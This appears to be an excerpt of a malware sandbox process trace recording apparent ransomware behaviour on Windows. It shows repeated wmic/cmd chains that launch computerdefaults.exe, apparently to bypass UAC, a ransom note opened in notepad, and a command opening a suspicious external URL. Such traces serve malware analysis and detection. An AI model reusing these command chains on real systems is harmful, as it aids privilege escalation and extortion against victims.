\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:664
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:2468
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2316 -
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:636
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3472
-
-
-
c:\windows\system32\sihost.exesihost.exe1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2308 -
\??\c:\windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1792
-
-
\??\c:\windows\system32\cmd.execmd /c "start http://30b89af86aec44d00celtalkfzj.jobsbig.cam/eltalkfzj^&1^&33782456^&63^&311^&2215063"2⤵PID:2472
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4088
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4740 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4332
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4788 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:1420
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4780 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4040
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4772 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4100
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4764 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4380
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4756 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4464
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4748 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:3960
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4732 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4296
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4724 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4448
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4716 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4376
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4708 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4400
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4468
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4412
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:5108
-